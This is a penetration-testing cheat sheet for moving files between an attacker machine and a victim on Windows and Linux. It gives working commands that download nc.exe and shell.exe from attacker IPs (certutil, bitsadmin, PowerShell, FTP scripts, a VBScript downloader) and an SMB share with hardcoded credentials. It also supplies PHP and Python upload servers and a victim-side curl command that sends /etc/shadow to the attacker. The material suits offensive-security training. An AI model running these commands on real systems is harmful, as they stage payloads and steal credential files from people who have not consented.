File Transfer
Windows
Download a file from a web server
bitsadmin /Transfer RoutineJob http://10.10.x.y/file.txt C:\windows\tasks\file.txt
HTTP Server
# kali
python3 -m http.server 80
# windows
[cmd] certutil.exe -urlcache -f http://<ip kali>/nc.exe nc.exe
[PS] Invoke-WebRequest -Uri "http://<ip kali>/nc.exe" -OutFile "C:\Windows\Tasks\nc.exe"
Impacket-smbserver
# kali linux
impacket-smbserver -smb2support -user test -password P@ssw0rd warrior `pwd`
# windows target
[PS] net use * \\192.168.45.198\warrior /user:test P@ssw0rd
or
[cmd] net use * \\<kali ip>\warrior
[cmd] cd Z:\nc.exe
# windows target run [ctrl + r]
\\<kali ip>\warrior
FTP with Python
Create an FTP server with Python
## kali (attacker)
python -m pyftpdlib -p 21
## victim (windows)
[cmd] cd wmpub
[cmd] echo open 192.168.45.207 21>>ftp.txt&echo USER anonymous>>ftp.txt&echo anonymous>>ftp.txt&echo bin>>ftp.txt&echo GET nc.exe>>ftp.txt&echo bye>>ftp.txt
[cmd] echo open 10.10.14.13 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET nc.exe >> ftp.txt&echo bye>> ftp.txt
[cmd] ftp -v -n -s:ftp.txt
wget with VBScript
Run wget.vbs:
windows
./wget.vbs http://<attacker ip>/shell.exe shell.exe
kali
cscript wget.vbs http://<attacker ip>/shell.exe shell.exe
wget.vbs
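' wget.vbs <url> <output file>
' Fetches <url> with WinHTTP (or an MSXML fallback) and writes the response
' body byte by byte to <output file>. Exits with code 1 when no HTTP object
' could be created, the request raised an error, or the server did not reply 200.
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
' Proxy-setting constants of WinHttpRequest; not used below, kept for reference.
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http, varByteArray, lngCounter, fs, ts
' CreateObject raises a runtime error (it does not return Nothing) when a
' ProgID is unavailable, so the fallback chain only works under
' On Error Resume Next; without it Err.Clear was a no-op and the first
' missing ProgID aborted the script.
On Error Resume Next
Err.Clear
Set http = Nothing
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
If http Is Nothing Then WScript.Quit 1
Err.Clear
http.Open "GET", strUrl, False
http.Send
' A failed request or a non-200 reply (e.g. an error page) must not be saved as the file.
If Err.Number <> 0 Then WScript.Quit 1
If http.Status <> 200 Then WScript.Quit 1
On Error GoTo 0
varByteArray = http.ResponseBody
Set http = Nothing
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile, True)
' Bytes go through Chr() into a text stream, i.e. via the system ANSI code page;
' byte values with no mapping in that code page may be altered, so compare the
' size/hash of the result (ADODB.Stream is the binary-safe alternative).
For lngCounter = 0 To UBound(varByteArray)
    ts.Write Chr(255 And AscB(MidB(varByteArray, lngCounter + 1, 1)))
Next
ts.Close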
Non-interactive commands (write wget.vbs line by line):
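REM Writes wget.vbs one echo per line (first line creates the file, the rest append).
REM The not-equal operator in the two Err.Number / http.Status lines is caret-escaped
REM so cmd does not treat it as redirection.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, lngCounter, fs, ts >> wget.vbs
REM On Error Resume Next is required for the CreateObject fallback chain:
REM a missing ProgID raises an error instead of returning Nothing.
echo On Error Resume Next >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo If http Is Nothing Then WScript.Quit 1 >> wget.vbs
echo Err.Clear >> wget.vbs
echo http.Open "GET", strUrl, False >> wget.vbs
echo http.Send >> wget.vbs
REM A failed request or a non-200 reply must not be written out as the file.
echo If Err.Number ^<^> 0 Then WScript.Quit 1 >> wget.vbs
echo If http.Status ^<^> 200 Then WScript.Quit 1 >> wget.vbs
echo On Error GoTo 0 >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo For lngCounter = 0 To UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And AscB(MidB(varByteArray, lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs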
Linux
netcat
# On the receiving end, running
nc -l -p 1234 > out.file
# will begin listening on port 1234.
# On the sending end running,
nc -w 3 [destination] 1234 < out.file
Upload.php
Attacker Machine:
Set up the PHP upload script on the web server:
/var/www/html/upload.php
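<?php
// Receives a multipart/form-data upload sent in the "uploadedfile" field and
// stores it under uploads/ (relative to this script). The uploads/ directory
// must already exist and be writable by the web server user, otherwise
// move_uploaded_file() fails and the error message below is shown.
$target_dir = "uploads/";
// A missing field or a PHP-side upload error is reported instead of producing
// undefined-index notices and an empty "Source=" line.
if (!isset($_FILES['uploadedfile']) || $_FILES['uploadedfile']['error'] !== UPLOAD_ERR_OK) {
    echo "There was an error uploading the file, please try again!";
    exit;
}
// basename() strips any directory component of the client-supplied name, so
// the file cannot be written outside uploads/.
$name = basename($_FILES['uploadedfile']['name']);
$target_path = $target_dir . $name;
// The name is chosen by the client, so it is escaped before being echoed back.
echo "Source=" . htmlspecialchars($_FILES['uploadedfile']['name']) . "<br />";
echo "Target path=" . htmlspecialchars($target_path) . "<br />";
echo "Size=" . (int)$_FILES['uploadedfile']['size'] . "<br />";
if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file " . htmlspecialchars($name) . " has been uploaded";
} else {
    echo "There was an error uploading the file, please try again!";
}
?>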
Start the Apache server:
systemctl start apache2
Victim:
curl --form "uploadedfile=@/etc/shadow" http://<attacker ip>/upload.php
Python Simple Upload HTTP Server
Run this on the attacker machine; it lets the victim machine download files from it and upload files to it.
import cgi
import html
import http.server
import os
import shutil
import socketserver
import urllib.parse
from pathlib import Path
# TCP port the server listens on (bound on all interfaces in the main block below).
PORT = 8080
# Directory, relative to the working directory, where POST /upload stores files;
# the same relative path is what GET / links to.
UPLOAD_DIRECTORY = "./uploaded"
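class UploadHandler(http.server.SimpleHTTPRequestHandler):
    """Static-file handler extended with a listing page and an upload endpoint.

    GET /        -> HTML page listing the files in UPLOAD_DIRECTORY plus an upload form.
    GET <other>  -> static file from the current working directory (base-class
                    behaviour); everything under the cwd is downloadable, so start
                    the server from a directory that holds only what should be served.
    POST /upload -> the multipart ``file`` field is written into UPLOAD_DIRECTORY
                    under its basename; anything else POSTed gets a 404 (the base
                    class has no do_POST, so delegating to it raised AttributeError).

    Fixes relative to the first version: the listing links carried literal
    placeholder text instead of the file name, file names were inserted into the
    HTML unescaped, a request without a ``file`` field raised KeyError, and the
    href contained the "./" prefix of UPLOAD_DIRECTORY.
    """

    def _reply(self, status, body):
        """Send a complete small HTML response with an explicit Content-Length.

        Args:
            status: HTTP status code.
            body: response body as bytes.
        """
        self.send_response(status)
        self.send_header('Content-Type', 'text/html; charset=utf-8')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def _listing_html(self):
        """Return a <ul> of the files currently in UPLOAD_DIRECTORY.

        The link text is HTML-escaped and the href percent-encoded, so a file
        named e.g. ``<b>x</b>`` or ``a b.txt`` renders and links correctly.
        """
        # The base class serves paths relative to the cwd, so "./uploaded/x" is
        # reachable as "/uploaded/x"; normpath drops the leading "./".
        prefix = "/" + os.path.normpath(UPLOAD_DIRECTORY).replace(os.sep, "/")
        items = []
        for filename in sorted(os.listdir(UPLOAD_DIRECTORY)):
            href = f"{prefix}/{urllib.parse.quote(filename)}"
            items.append(f'<li><a href="{href}">{html.escape(filename)}</a></li>')
        return "<ul>" + "".join(items) + "</ul>"

    def do_GET(self):
        """Serve the listing/upload page at "/"; any other path is a plain static-file GET."""
        if self.path != '/':
            super().do_GET()
            return
        # Build the whole page before sending anything, so a failing
        # os.listdir() aborts before a 200 status line has gone out.
        page = f'''<!DOCTYPE html>
<html>
<head>
<title>Files List</title>
</head>
<body>
<h1>Files:</h1>
{self._listing_html()}
<form action="/upload" method="post" enctype="multipart/form-data">
Select file to upload: <input type="file" name="file" id="file">
<input type="submit" value="Upload" name="submit">
</form>
</body>
</html>'''
        self._reply(200, page.encode())

    def do_POST(self):
        """Store the multipart ``file`` field of POST /upload into UPLOAD_DIRECTORY.

        Replies 303 to "/" on success, 400 when no usable file was sent and
        404 for any other POST path.
        """
        if self.path != '/upload':
            self.send_error(404)
            return
        # cgi is deprecated (PEP 594) and removed in Python 3.13; on such
        # interpreters the multipart parsing needs another implementation.
        form = cgi.FieldStorage(
            fp=self.rfile,
            headers=self.headers,
            environ={'REQUEST_METHOD': 'POST'},
        )
        try:
            file_item = form['file']
        except (KeyError, TypeError):  # field absent, or body not multipart/form-data
            file_item = None
        # Only the basename of the client-supplied name is used, so the upload
        # cannot land outside UPLOAD_DIRECTORY; "." and ".." are rejected too.
        name = ""
        if file_item is not None and file_item.filename:
            name = Path(file_item.filename).name
        if not name or name in ('.', '..'):
            self._reply(400, b'<h1>No file was uploaded</h1>')
            return
        upload_path = Path(UPLOAD_DIRECTORY) / name
        with open(upload_path, 'wb') as out:
            # Stream to disk instead of reading the whole upload into memory.
            shutil.copyfileobj(file_item.file, out)
        self.send_response(303)  # "See Other": the browser reloads the listing at "/"
        self.send_header('Location', '/')
        self.end_headers()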
if __name__ == "__main__":
    # Create the upload directory on first start; an existing one is left alone.
    if not Path(UPLOAD_DIRECTORY).exists():
        os.makedirs(UPLOAD_DIRECTORY)
    # An empty host binds every interface: anyone who can reach PORT can
    # download from the working directory and upload into UPLOAD_DIRECTORY.
    server = socketserver.TCPServer(("", PORT), UploadHandler)
    with server as httpd:
        print(f"Serving at http://localhost:{PORT}")
        httpd.serve_forever()